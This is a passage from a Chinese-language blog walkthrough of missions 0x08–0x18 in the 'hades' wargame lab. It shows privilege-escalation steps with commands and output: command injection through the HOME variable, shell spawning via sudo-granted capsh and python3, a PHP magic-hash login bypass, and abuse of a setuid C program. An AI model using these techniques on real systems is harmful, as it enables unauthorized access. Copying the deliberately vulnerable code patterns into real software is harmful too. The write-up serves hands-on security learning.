class="line">HOME=/pwned/ariadne;/id; ./homecontent</span><br><span class="line">uid=2048(aphrodite) gid=2048(aphrodite) <span class="built_in">groups</span>=2048(aphrodite)</span><br><span class="line">The content of your HOME is:</span><br><span class="line">ariadne_pass.txt  flagz.txt  homecontent  mission.txt</span><br><span class="line"><span class="comment"># 看样子 HOME 是可以注入的，但是是 aphrodite 的身份，那么就是没有权限看 ariadne_pass.txt</span></span><br><span class="line"><span class="comment"># 翻看了大佬的视频，发现我这个方法用错了，试试：</span></span><br><span class="line">aphrodite@hades:/pwned/aphrodite$ HOME=<span class="string">&#x27;/pwned/ariadne;id;&#x27;</span> ./homecontent</span><br><span class="line">The content of your HOME is:</span><br><span class="line">/bin/ls: cannot open directory <span class="string">&#x27;/pwned/ariadne&#x27;</span>: Permission denied</span><br><span class="line">uid=2049(ariadne) gid=2048(aphrodite) <span class="built_in">groups</span>=2048(aphrodite)</span><br><span class="line"><span class="comment"># id 就对了，那么拿 bash 吧</span></span><br><span class="line">HOME=<span class="string">&#x27;/pwned/ariadne;/bin/bash;&#x27;</span> ./homecontent</span><br><span class="line"><span class="built_in">cat</span> ariadne_pass.txt</span><br><span class="line"><span class="comment"># 拿到密码</span></span><br><span class="line">ssh ariadne@127.0.0.1</span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x08"><a href="#MISSION-0x08" class="headerlink" title="MISSION 0x08"></a>MISSION 0x08</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user arete lets us use cp on her behalf.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line"><span class="comment"># 没啥东西，能用别人的命令？</span></span><br><span class="line">sudo -l</span><br><span class="line"><span class="comment"># (arete) NOPASSWD: /bin/cp</span></span><br><span class="line"><span class="comment"># 临时用 arete 的 cp 来拿到密码</span></span><br><span class="line">sudo -u arete /bin/cp /pwned/arete/arete_pass.txt /var/tmp/arete_pass.txt</span><br><span class="line"><span class="comment"># /bin/cp: cannot stat &#x27;/pwned/arete/arete_pass.txt&#x27;: No such file or directory</span></span><br><span class="line"><span class="comment"># 密码去哪了，先看 flag 吧</span></span><br><span class="line">sudo -u arete /bin/cp /pwned/arete/flagz.txt /var/tmp/arete_pass.txt</span><br><span class="line"><span class="built_in">cat</span> /var/tmp/arete_pass.txt</span><br><span class="line"><span class="comment"># cat: /var/tmp/arete_pass.txt: Permission denied</span></span><br><span class="line"><span class="comment"># 木有权限啊，那出输出到控制台</span></span><br><span class="line">sudo -u arete /bin/cp /pwned/arete/flagz.txt /dev/stdout</span><br><span class="line"><span class="comment"># 还是没找到密码，不管了，flag 拿到后，后台有密码。</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x09"><a href="#MISSION-0x09" class="headerlink" title="MISSION 0x09"></a>MISSION 0x09</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user artemis allows us to use some binary on her behalf. Its a gift...</span></span><br><span class="line">sudo -l </span><br><span class="line"><span class="comment"># (artemis) NOPASSWD: /sbin/capsh</span></span><br><span class="line"><span class="comment"># 有一个 capsh 命令，执行看看</span></span><br><span class="line">/sbin/capsh -h</span><br><span class="line"><span class="comment"># 出来一堆用法</span></span><br><span class="line">--<span class="built_in">chroot</span>=path  <span class="built_in">chroot</span>(2) to this path</span><br><span class="line">--gid=&lt;n&gt;      <span class="built_in">set</span> gid to &lt;n&gt; (hint: <span class="built_in">id</span> &lt;username&gt;)</span><br><span class="line">--<span class="built_in">groups</span>=g,... <span class="built_in">set</span> the supplemental <span class="built_in">groups</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 看到这些东西，感觉应该就用这个提权了，这个东西不太熟悉，搜索了一下，果然有提权的方法</span></span><br><span class="line">sudo -u artemis /sbin/capsh --</span><br><span class="line"><span class="comment"># 就行了</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x10"><a href="#MISSION-0x10" class="headerlink" title="MISSION 0x10"></a>MISSION 0x10</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># We need /bin/bash so that the user asia gives us her password.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line">-rw---x--- 1 root    artemis 16056 Jul 26  2023 restricted</span><br><span class="line"></span><br><span class="line"><span class="comment"># 有一个 restricted 文件，执行看看</span></span><br><span class="line">./restricted</span><br><span class="line">Your SHELL is: /bin/bash</span><br><span class="line"></span><br><span class="line">djqWtkLisbQlrGtLYHCv</span><br><span class="line"><span class="comment"># 下面这个难道就是密码？ </span></span><br><span class="line">ssh asia@127.0.0.1 </span><br><span class="line"></span><br><span class="line"><span class="comment"># 还真是。。。这什么鬼。。</span></span><br></pre></td></tr></table></figure>



<h1 id="MISSION-0x11"><a href="#MISSION-0x11" class="headerlink" title="MISSION 0x11"></a>MISSION 0x11</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user asteria is teaching us to program in python.</span></span><br><span class="line">python3 -V</span><br><span class="line"><span class="comment"># Python 3.11.2</span></span><br><span class="line">sudo -l </span><br><span class="line"><span class="comment"># (asteria) NOPASSWD: /usr/bin/python3</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 这不直接 python3 加载 tty 就行了？</span></span><br><span class="line">sudo -u asteria /usr/bin/python3 -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 果然。。。。</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x12"><a href="#MISSION-0x12" class="headerlink" title="MISSION 0x12"></a>MISSION 0x12</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># The user astraea believes in magic.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line">total 36</span><br><span class="line">-rw-r----- 1 root    asteria  161 Jul 26  2023 sihiri_old.php</span><br><span class="line"><span class="comment"># 看看源代码</span></span><br><span class="line"><span class="built_in">cat</span> sihiri_old.php</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$pass</span> = <span class="title function_ invoke__">hash</span>(<span class="string">&#x27;md5&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;pass&#x27;</span>]);</span><br><span class="line"><span class="variable">$pass2</span> = <span class="title function_ invoke__">hash</span>(<span class="string">&#x27;md5&#x27;</span>,<span class="string">&quot;ASTRAEA_PASS&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$pass</span> == <span class="variable">$pass2</span>)&#123;</span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;ASTRAEA_PASS&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;Incorrect ^^&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>这。。难道密码就是 ASTRAEA_PASS 吗？</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line">ssh astraea@127.0.0.1</span><br><span class="line"><span class="comment"># 果然不对。那么密码可能是 md5(&quot;ASTRAEA_PASS&quot;)</span></span><br><span class="line"><span class="built_in">echo</span> -n <span class="string">&quot;ASTRAEA_PASS&quot;</span> | <span class="built_in">md5sum</span></span><br><span class="line"><span class="comment"># 还不对。。。那么是不是大小写的问题，全转为大写</span></span><br><span class="line"><span class="built_in">echo</span> -n <span class="string">&quot;ASTRAEA_PASS&quot;</span> | <span class="built_in">md5sum</span>  | <span class="built_in">tr</span> <span class="string">&quot;a-z&quot;</span> <span class="string">&quot;A-Z&quot;</span></span><br><span class="line"><span class="comment"># 还是不对，难道是 ASTRAEA_PASS 的小写？</span></span><br><span class="line"><span class="built_in">echo</span> -n <span class="string">&quot;ASTRAEA_PASS&quot;</span> | <span class="built_in">tr</span> <span class="string">&quot;A-Z&quot;</span> <span class="string">&quot;a-z&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 这一顿尝试，我突然相信魔法了：</span></span><br><span class="line">curl localhost/sihiri_old.php?pass=ASTRAEA_PASS</span><br><span class="line"><span class="comment"># 404 , 换个姿势</span></span><br><span class="line">curl localhost/sihiri.php?pass=ASTRAEA_PASS</span><br><span class="line"><span class="comment"># Incorrect ^^</span></span><br><span class="line">php -a</span><br><span class="line"><span class="comment"># 进入 php 的交互模式</span></span><br><span class="line">php &gt; <span class="built_in">echo</span> <span class="built_in">hash</span>(<span class="string">&#x27;md5&#x27;</span>,<span class="string">&quot;ASTRAEA_PASS&quot;</span>);</span><br><span class="line">5ed80cd50abcedab810155553a0536ea</span><br><span class="line"></span><br><span class="line"><span class="comment"># 退出来</span></span><br><span class="line">curl localhost/sihiri.php?pass=5ed80cd50abcedab810155553a0536ea</span><br><span class="line"><span class="comment"># 还是不对 ， 试试大小写</span></span><br><span class="line">curl localhost/sihiri.php?pass=5ED80CD50ABCEDAB810155553A0536EA</span><br><span class="line"><span class="comment"># 我突然想到了，</span></span><br><span class="line"><span class="built_in">ls</span> -al /var/www/html</span><br><span class="line">total 28</span><br><span class="line">drwxr-xr-x 2 root     root     4096 Jul 26  2023 .</span><br><span class="line">drwxr-xr-x 4 root     root     4096 Jul 26  2023 ..</span><br><span class="line">-r--r----- 1 www-data www-data 2061 Feb 16  2018 id.zip</span><br><span class="line">-r--r----- 1 www-data www-data  195 Dec 29  1976 irene_auth.php</span><br><span class="line">-rw------- 1 www-data www-data  106 May 11  1997 req.php</span><br><span class="line">-r--r----- 1 www-data www-data 1037 Jun  9  2000 request.php</span><br><span class="line">-r--r----- 1 www-data www-data  169 May  3  1997 sihiri.php</span><br><span class="line"><span class="comment"># 没戏，没有权限看源码，突然想起来 PHP 对于这个 == 的判断，是不是有问题，找了找文章。</span></span><br><span class="line"><span class="comment"># 果然，PHP 在判断数字和字符串的时候，会自动转换， 也叫 Magic Hashes ，找了  </span></span><br><span class="line"><span class="comment"># 这个： https://github.com/spaze/hashes/blob/master/md5.md</span></span><br><span class="line">curl localhost/sihiri.php?pass=QLTHNDT</span><br><span class="line"><span class="comment"># 拿到密码：</span></span><br><span class="line">ssh astraea@127.0.0.1</span><br><span class="line"><span class="comment"># 登陆上去之后，立刻被 T 掉了，而且给了个隐藏 Flag </span></span><br><span class="line"><span class="comment"># 最后翻了大佬的 WP，竟然是要 FTP 上去,因为一会要 get，所以先去一个有写入权限的地方</span></span><br><span class="line"><span class="built_in">cd</span> /var/tmp</span><br><span class="line">ftp astraea@127.0.0.1</span><br><span class="line"><span class="comment"># # 看看目录下其他人的文件，应该有重名的 get 的时候要重命名</span></span><br><span class="line">get flagz.txt flagz_2.txt</span><br><span class="line">get atalanta.txt atalanta2.txt</span><br><span class="line"><span class="comment"># 退出</span></span><br><span class="line">ssh atalanta@127.0.0.1</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>


<h1 id="MISSION-0x14"><a href="#MISSION-0x14" class="headerlink" title="MISSION 0x14"></a>MISSION 0x14</h1><p>刚才那个算了两关</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User athena lets us run her program, but she hasn&#x27;t left us her source code.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line">-r-sr-s--- 1 root     atalanta 16608 Jul 26  2023 weird</span><br><span class="line">-r-------- 1 atalanta atalanta   927 Jul 26  2023 weird.c</span><br><span class="line"><span class="comment"># 有个C文件夹，有read权限</span></span><br><span class="line"><span class="comment"># 丢给 ChatGPT 逐行解释下文件</span></span><br><span class="line"><span class="built_in">cat</span> weird.c</span><br></pre></td></tr></table></figure>

<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;pwd.h&gt;</span></span></span><br><span class="line"><span class="comment">// 这里包含了一些头文件，分别是stdlib.h（标准库）、string.h（字符串处理）、sys/stat.h（文件状态信息）、pwd.h（密码文件访问）。</span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    setuid(<span class="number">2006</span>);</span><br><span class="line">    setgid(<span class="number">2006</span>);</span><br><span class="line">    <span class="comment">// 通过setuid(2006)和setgid(2006)设置程序的用户ID和组ID为2006。是以下一关的用户权限执行程序。</span></span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *filename;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">stat</span> <span class="title">fs</span>;</span></span><br><span class="line">    <span class="type">int</span> r;</span><br><span class="line">    <span class="comment">// 定义了一些变量，filename是一个指向常量字符的指针，struct stat fs用于存储文件状态信息，r是一个整数用于存储函数调用的返回值。</span></span><br><span class="line">    filename = getenv(<span class="string">&quot;HOME&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span> (<span class="string">&quot;HOME detected: %s\n&quot;</span>,filename);</span><br><span class="line">    <span class="comment">// 获取环境变量HOME的值，并将其赋给filename。然后使用printf函数输出HOME的值。</span></span><br><span class="line">    <span class="type">char</span> cmd[<span class="number">1000</span>];</span><br><span class="line">    FILE *out_file = fopen(getenv(<span class="string">&quot;HOME&quot;</span>), <span class="string">&quot;w&quot;</span>);</span><br><span class="line">    <span class="comment">// 定义一个字符数组cmd和一个文件指针out_file。使用fopen函数以写入方式打开文件，文件路径为HOME环境变量的值。</span></span><br><span class="line">    FILE *fpipe;</span><br><span class="line">    <span class="type">char</span> *command = <span class="string">&quot;/bin/cat /var/lib/me&quot;</span>;</span><br><span class="line">    <span class="type">char</span> c = <span class="number">0</span>;</span><br><span class="line">    <span class="comment">// 定义了另一个文件指针fpipe，一个字符数组command用于存储要执行的命令，c是一个字符用于存储文件中的每个字符。</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="number">0</span> == (fpipe = (FILE*)popen(command, <span class="string">&quot;r&quot;</span>)))</span><br><span class="line">    &#123;</span><br><span class="line">        perror(<span class="string">&quot;popen() failed.&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 使用popen函数执行命令，并将结果通过管道读取到fpipe中。如果popen执行失败，打印错误信息并退出程序。</span></span><br><span class="line">    <span class="keyword">while</span> (fread(&amp;c, <span class="keyword">sizeof</span> c, <span class="number">1</span>, fpipe))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">fprintf</span>(out_file, <span class="string">&quot;%c&quot;</span>,c);</span><br><span class="line">    &#125;</span><br><span class="line">    pclose(fpipe);</span><br><span class="line">    pclose(out_file);</span><br><span class="line">    <span class="comment">// 通过循环从fpipe中读取字符，并将其写入到out_file中。然后关闭fpipe和out_file。</span></span><br><span class="line">    r = stat(filename,&amp;fs);</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">passwd</span> *<span class="title">pw</span> =</span> getpwuid(fs.st_uid);</span><br><span class="line">    <span class="keyword">if</span> (pw-&gt;pw_name != <span class="string">&quot;atalanta&quot;</span>)&#123;</span><br><span class="line">    r = chmod( filename, fs.st_mode &amp; ~(S_IROTH)+~(S_IRGRP) | S_IWGRP );</span><br><span class="line">    &#125;</span><br><span class="line">    stat(filename,&amp;fs);</span><br><span class="line">    <span class="comment">// 获取文件filename的状态信息，并通过getpwuid函数获取文件所有者的用户名。如果文件所有者不是&quot;atalanta&quot;，则使用chmod函数修改文件权限。 atalanta 是当前用户</span></span><br><span class="line">    <span class="keyword">return</span> EXIT_SUCCESS</span><br><span class="line">    <span class="comment">// 程序执行成功，返回0。</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>简单来说，从 <code>/var/lib/me</code> cat 出来的东西，写入了 HOME 变量的文件，我们保持一个文件的 777，然后就可以写入、读取了。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">atalanta@hades:~$ HOME=/tmp/todd_key ./weird</span><br><span class="line">HOME detected: /tmp/todd_key</span><br><span class="line">atalanta@hades:~$ <span class="built_in">cat</span> /tmp/todd_key</span><br><span class="line">km----------oV</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>读到密码，进入下一个用户 athena<br><code>ssh athena@127.0.0.1</code></p>
<h1 id="MISSION-0x15"><a href="#MISSION-0x15" class="headerlink" title="MISSION 0x15"></a>MISSION 0x15</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User aura lets us use her new script.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line"><span class="comment"># -rw-r----- 1 root   athena  166 Jul 26  2023 auri_old.sh</span></span><br><span class="line"><span class="built_in">cat</span> auri_old.sh</span><br><span class="line"></span><br><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;What?&quot;</span></span><br><span class="line"><span class="built_in">read</span> hackme</span><br><span class="line"><span class="comment">#Secure the condition!</span></span><br><span class="line"><span class="comment">#if [[ $hackme =~ &quot;????????&quot; ]]; then</span></span><br><span class="line"><span class="comment">#exit</span></span><br><span class="line"><span class="comment">#fi</span></span><br><span class="line"><span class="comment">#Add newest Aura pass!</span></span><br><span class="line"><span class="comment">#$hackme AURANEWPASS 2&gt;/dev/null</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 看起来是输入一个不匹配&quot;????????&quot;的正则的命令，然后就可以执行这个命令 ，拼上下个人的密码</span></span><br><span class="line">sudo -l</span><br><span class="line"><span class="comment"># (aura) NOPASSWD: /bin/bash -c /pwned/aura/auri.sh</span></span><br><span class="line"><span class="comment"># 可以用aura的身份执行 auri.sh</span></span><br><span class="line">sudo -u aura /bin/bash -c /pwned/aura/auri.sh</span><br><span class="line"></span><br><span class="line"><span class="comment"># 符合正则的命令是什么呢？</span></span><br><span class="line"><span class="comment"># 试了 cat、more、less、head、tail、vim、echo、nano、vi、grep、printf，终于：</span></span><br><span class="line">sudo -u aura /bin/bash -c /pwned/aura/auri.sh</span><br><span class="line"><span class="comment">#What?</span></span><br><span class="line"><span class="comment">#printf</span></span><br><span class="line"><span class="comment"># Ti----Rh</span></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x16"><a href="#MISSION-0x16" class="headerlink" title="MISSION 0x16"></a>MISSION 0x16</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User aegle has a good memory for numbers.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line"></span><br><span class="line">-rw-r-x--- 1 root aura   160 Jul 26  2023 auri.sh</span><br><span class="line">-rw-r----- 1 root aura    22 Jul 26  2023 flagz.txt</span><br><span class="line">-rw-r----- 1 root aura   168 Jul 26  2023 mission.txt</span><br><span class="line">-rw---x--- 1 root aura 16064 Jul 26  2023 numbers</span><br><span class="line"></span><br><span class="line"><span class="comment"># 好奇看了一眼 auri.sh</span></span><br><span class="line"><span class="built_in">cat</span> auri.sh</span><br><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;What?&quot;</span></span><br><span class="line"><span class="built_in">read</span> hackme</span><br><span class="line"><span class="keyword">if</span> [[ <span class="variable">$hackme</span> == *<span class="string">&quot;e&quot;</span>* || <span class="variable">$hackme</span> == *<span class="string">&quot;o&quot;</span>* || <span class="variable">$hackme</span> == *<span class="string">&quot;?&quot;</span>* ]]; <span class="keyword">then</span></span><br><span class="line"><span class="built_in">exit</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"><span class="variable">$hackme</span> Ti-----Rh 2&gt;/dev/null</span><br><span class="line"></span><br><span class="line"><span class="comment"># 好吧，原来是个字符串在这里，又屏蔽了报错。</span></span><br><span class="line"></span><br><span class="line">./numbers</span><br><span class="line"><span class="comment"># 接下来就是猜数字了，使用 Here 文档 传递多行数字，测试</span></span><br><span class="line"><span class="comment"># 最后测出来</span></span><br><span class="line">./numbers &lt;&lt;<span class="string">EOF</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">2</span></span><br><span class="line"><span class="string">3</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">2</span></span><br><span class="line"><span class="string">3</span></span><br><span class="line"><span class="string">9</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">2</span></span><br><span class="line"><span class="string">6</span></span><br><span class="line"><span class="string">EOF</span></span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x17"><a href="#MISSION-0x17" class="headerlink" title="MISSION 0x17"></a>MISSION 0x17</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User calliope likes to have her things looked at.</span></span><br><span class="line"><span class="built_in">ls</span> -al</span><br><span class="line"><span class="comment"># -rw-r----- 1 root  calliope   21 Jul 26  2023 calliope_pass.txt</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 有一个密码文件，没权限看</span></span><br><span class="line">sudo -l</span><br><span class="line"><span class="comment"># (calliope) NOPASSWD: /bin/cat</span></span><br><span class="line">sudo -u calliope /bin/cat /pwned/aegle/calliope_pass.txt</span><br><span class="line"><span class="comment"># /bin/cat: /pwned/aegle/calliope_pass.txt: Permission denied</span></span><br><span class="line"><span class="comment"># 木有权限，奇怪了我不是已经是 calliope 了吗？那我读 Flag 总行吧？</span></span><br><span class="line">sudo -u calliope /bin/cat /pwned/calliope/flagz.txt</span><br><span class="line"><span class="comment"># 可以读到，读到后用页面上的密码了。</span></span><br><span class="line">ssh calliope@127.0.0.1</span><br></pre></td></tr></table></figure>

<h1 id="MISSION-0x18"><a href="#MISSION-0x18" class="headerlink" title="MISSION 0x18"></a>MISSION 0x18</h1><pre><code class="bash">cat mission.txt
# The user calypso often uses write to communicate.
ls -al
-r-s--s--- 1 root     calliope 16360 Jul 26  2023 writeme
# 有一个 writeme 文件，执行看看
./writeme
# Cannot send you my pass!Cannot send you my pass!Cannot send you my pass!Cannot send you my pass!Cannot send you my pass!
# 重要的事情说 5 遍吗？


</code></pre>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%89%E5%85%A8-%E9%9D%B6%E6%9C%BA/" rel="tag"># 安全 靶机</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
